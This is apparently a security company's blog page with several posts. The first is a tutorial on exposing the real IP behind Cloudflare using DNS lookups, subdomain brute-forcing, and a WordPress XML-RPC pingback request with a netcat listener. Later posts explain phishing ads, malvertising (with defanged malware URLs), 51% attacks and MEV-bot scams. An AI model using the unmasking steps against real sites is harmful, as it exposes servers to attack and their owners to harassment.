Category: Alvosec

WARNING: The content of this article are for testing purposes or it can be used to investigate fraudulent websites. Any actions taken based on the information provided here are at the reader’s own risk.

Reverse proxy services like Cloudflare can improve a website’s speed and security by adding an additional layer of protection. This also provides a level of anonymity, as the hosting provider and other information about the website are concealed.

With a reverse proxy service in place, it becomes challenging, or even impossible, for external parties to determine the website’s hosting provider. This anonymity allows content owners to conceal the source IP address of their server and safeguard it from potential attacks.

How to find the actual hosting provider of a website protected by Cloudflare

Finding the actual hosting provider of a website using a reverse proxy service like Cloudflare requires searching for evidence of past or current misconfigurations. It is crucial to understand the ways a website owner might leave behind a trail and, if you are the site owner, to take measures to maintain anonymity. For instance, the original web server’s IP may have remained unchanged or unsecured, which could indicate that the hosting provider has not been altered. In the case that the IP was changed, it’s possible that the hosting provider’s IP neighborhood remained the same before transitioning to use Cloudflare as a front end.

1. Check DNS records

Check the website’s DNS records: The first step is to look at the domain name system (DNS) records of the website in question. These records contain information about the website’s IP address, and you can use online tools like Whois or Dig to look them up. If you see multiple IP addresses listed, it’s likely that one of them belongs to the real website host, while the others are Cloudflare’s IP addresses.

dig example.com

or try to lookup for MX records:

dig mx example.com

2. Investigate subdomains

First you need to locate all subdomains which can be achieved by brute-forcing subdomain names. You can use Nmap with script:

nmap –script dns-brute example.com

or you can simply use any tool available to enumerate subdomains:

dnsenum example.com

A highly effective method of obtaining subdomains is through enumeration using the Certificate Transparency logs stored by Censys. Remember to check for SANs – Subject Alternative Name.

3. Find web applications that may expose IP address

Finding the real IP behind a web application involves determining the actual network location of a server hosting the website, as opposed to the domain name or URL used to access it. This can be accomplished through fuzzing method.

example.com/cpanel try on port 2083

Anything that works on different port can expose IP address, search for any third party application that is listening on different port.

4. Use online service

Examining the domain history can also be beneficial, as sometimes the NS records are redirected to Cloudflare without altering the hosting provider.

Another possibility is to use something like Securitytrails to check a domain’s DNS history.

5. Discover IP through API calls on WordPress websites

Discovering an IP address can be done by using pingback XMLRPC calls. The pingback feature in WordPress allows a website to notify another website that it has linked to it. The notification is sent via an XMLRPC call to the target website, which can reveal its IP address.

Copy and paste the following template into the XML content text area of this website or save it as a file ping.xml.

<?xml version="1.0" ?>
<methodCall>
<methodName>ping</methodName>
<params>
 <param>
  <value>
<string>http://<IP>/</string>
  </value>
 </param>
 <param>
  <value>
<string>https://site.com/</string>
  </value>
 </param>
</params>
</methodCall>

Execute the following command: Replace ‘https://example.com/xmlrpc.php’ with the pingback URL from the beginning of this section, and use ‘ping.xml’ as the relative path to the file you just created.

curl -X POST -d @ping.xml https://example.com/xmlrpc.php

In an empty terminal window, execute the following command. It will wait for a connection from the target WordPress server. The ‘sudo’ command is required because the port being listened on is <= to 1024, which are reserved for root/admin access only.

sudo netcat -v -l -p 80

Once the command (curl) has been executed, wait for a short period for the data to appear in your netcat session. You should see something like this:

GET /hello/world HTTP/1.1
Host: 10.0.0.1
User-Agent: WordPress/6.1.1; http://example.com
Accept: */*
Accept-Encoding: deflate, gzip, br
Referer: http://10.0.0.1/hello/world
X-Pingback-Forwarded-For: 127.0.0.1
Connection: close

There are other methods for revealing the IP address hidden by Cloudflare, but they will be explained in a different article.

Hackers are continuously evolving their tactics to steal sensitive information and financial assets. One of their recent advancements includes the use of Google ads, IDN domains, and hacking of trusted social media accounts.

https://teamviewwer[.]tech/
Doing a Google search right now for "teamviewer" gives this ad… Obviously as expected, not the real @TeamViewer.
cc @1ZRR4H @wdormann pic.twitter.com/nTCfPGMnY3

— MalwareHunterTeam (@malwrhunterteam) January 26, 2023

Google ads provide a convenient platform for hackers to reach a large audience. They use phishing websites disguised as legitimate ones and promote them through Google ads to trick users into entering their personal information or financial details.

IDN domains, which allow the use of non-Latin characters in domain names, are also being abused by hackers. These domains can easily be made to look like well-known websites, making it easier for them to carry out phishing attacks

Internationalized Domain Names (IDNs) enable people around the world to use domain names in local languages and scripts.

Recently, hackers have been hacking popular social media accounts, such as Twitter, to promote their phishing websites. These websites often mimic popular cryptocurrency exchanges, allowing hackers to steal users’ crypto funds.

To sum up, hackers are constantly improving their tactics to steal sensitive information and financial assets. It is important for users to be vigilant and not fall for these phishing scams. They should always verify the authenticity of a website before entering any personal information and use reputable security solutions to protect their online activities.

MITRE ATT&CK™ (Adversarial Tactics, Techniques, and Common Knowledge) is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. It is intended to provide a foundation for improving an organization’s cybersecurity posture by helping security teams understand the ways that adversaries may attempt to compromise their systems.

One of the key components of MITRE ATT&CK™ is the use of techniques to detect and respond to malicious activity on a network. Techniques are specific methods or actions that adversaries can use to achieve their objectives. For example, one technique might be the use of a specific type of malware, while another might be the use of a phishing email to steal credentials.

To understand the role of these techniques in security detection, it’s important to understand how attackers work. Attackers will often use a combination of techniques to achieve their objectives, rather than relying on just one. For example, an attacker might use a phishing email to steal a user’s credentials, and then use that stolen information to gain access to the network. From there, the attacker might use malware to move laterally through the network, stealing data or disrupting operations.

To detect and respond to these types of attacks, security teams need to be able to identify the techniques being used by attackers, and to understand the potential impact of those techniques on their systems. This is where MITRE ATT&CK™ can be a valuable resource. By providing a detailed understanding of the techniques used by attackers, security teams can develop more effective detection and response strategies.

One way to use MITRE ATT&CK™ for detection is to map it to your existing security controls and identify gaps in coverage. Additionally, security teams can use it to identify the most likely techniques that would be used against their organization and prioritize the implementation of countermeasures accordingly.

If we sum up, MITRE ATT&CK™ provides a comprehensive knowledge base of adversary tactics and techniques that can be used to improve an organization’s cybersecurity posture. By understanding the techniques used by attackers and how they may be used to compromise systems, security teams can develop more effective detection and response strategies.

A 51% attack is a type of malicious attack that can be carried out on a blockchain network. In a 51% attack, an attacker or group of attackers control more than 50% of the network’s mining power, also known as hashrate. With this level of control, the attacker can manipulate the blockchain’s transaction history, double-spend coins, and prevent new transactions from being confirmed.

The concept of a 51% attack is unique to blockchain networks, which rely on a decentralized network of computers to validate and record transactions. In a decentralized network, no single entity has complete control over the network. However, if an attacker can amass enough mining power, they can effectively take control of the network and manipulate it to their advantage.

One of the most significant risks of a 51% attack is the ability to double-spend coins. In a double-spend attack, the attacker sends coins to a merchant or exchange and then uses their control over the network to reverse the transaction and keep the coins. This can have a severe impact on the value of the cryptocurrency and the confidence of its users.

Another risk is that a 51% attack can be used to prevent new transactions from being confirmed. This can effectively halt the network and prevent legitimate transactions from being processed. This can also cause a loss of confidence in the network and its ability to function.

To prevent a 51% attack, blockchain networks rely on a decentralized network of computers to validate transactions. This makes it much more difficult for an attacker to amass enough mining power to control the network. In addition, many blockchain networks use algorithms that make it more difficult for an attacker to gain control of the network even if they do control more than 50% of the mining power.

In conclusion, a 51% attack is a type of malicious attack that can be carried out on a blockchain network, where an attacker uses control over more than 50% of the network’s hashrate to manipulate the blockchain’s transaction history, double-spend coins, and prevent new transactions from being confirmed. To prevent a 51% attack, blockchain networks rely on a decentralized network of computers and use algorithms that make it more difficult for an attacker to gain control.

Malicious Google ads, also known as “malvertising,” are ads that have been designed to infect a user’s computer with malware. These ads can appear on any website that uses Google’s advertising network, including popular sites like YouTube and Gmail. Cybercriminals are tricking unsuspecting users into downloading malware that steals personal information by using malicious Google ads and web pages.

One common tactic used by attackers is to create a fake ad that looks like a legitimate download or update for a popular piece of software.

Another tactic is to use exploit kits, which are tools that exploit vulnerabilities in a user’s web browser or computer to install malware without their knowledge. Some exploit kits even use browser or operating system vulnerabilities that are not yet publicly known, known as zero-day vulnerabilities, to increase the chance of successful attacks.

Here is one example that we detected recently:

The ad will be displayed if you search for “obs download” or similar keywords.

OBS (Open Broadcaster Software) is free and open source software for video recording and live streaming.

When victim clicks on that ad it will be redirected to obsproect[.]site (note missing letter in domain name and wrong tld) – original website is obsproject.com.

If the victim attempts to download software, they will be prompted with this URL:

https://bitbucket[.]org/fightcillo/downloads-forus/downloads/Setup.zip

Avoid opening or downloading any files from these websites!

After submitting file to popular VirusTotal service, we can see that there are multiple indicators that file has malicious behavior.

Behavioral analysis showed that file has characteristics of trojan, meaning that attackers can steal any information from infected user – including cryptocurrency assets.

According to one Twitter user, his computer was infected with malware when he clicked a sponsored link in a Google search when he went to download the streaming software OBS.

Not only did the hackers drain his crypto wallet of his NFTs and crypto, including his beloved Mutant Ape, but they also hijacked his accounts to send out phishing links to his substantial followers.

In conclusion, malicious Google ads are a serious threat to the security of your computer. By taking steps to protect yourself, such as keeping your software up to date and using ad-blockers and anti-virus software, you can reduce the risk of being infected with malware from these ads. It is important to be vigilant and cautious when browsing the internet, as attackers are constantly finding new ways to distribute malware through ads.

Beware of MEV bots on social media. These scams advertise themselves as a way to make money on Uniswap, often with a large number of views on YouTube. However, they are actually just proxy contracts that forward your ETH deposits to a bad actor’s account. These scams are successful because they deceive users into thinking that the smart contract can profit from DEX trades by monitoring the mempool and frontrunning transactions, but in reality it is just stealing your deposits. Be cautious of any contracts claiming to be UniswapLiquidityBots.

If it’s too good to be true, it probably is!

Here is a screenshot of YouTube channel that promotes this type of scam:

A smart contract includes hidden parameters that allow an attacker to drain your deposits.

Harry.eth posted on Twitter interesting thread regrading this scam.

https://twitter.com/sniko_/status/1549807252491706369?lang=en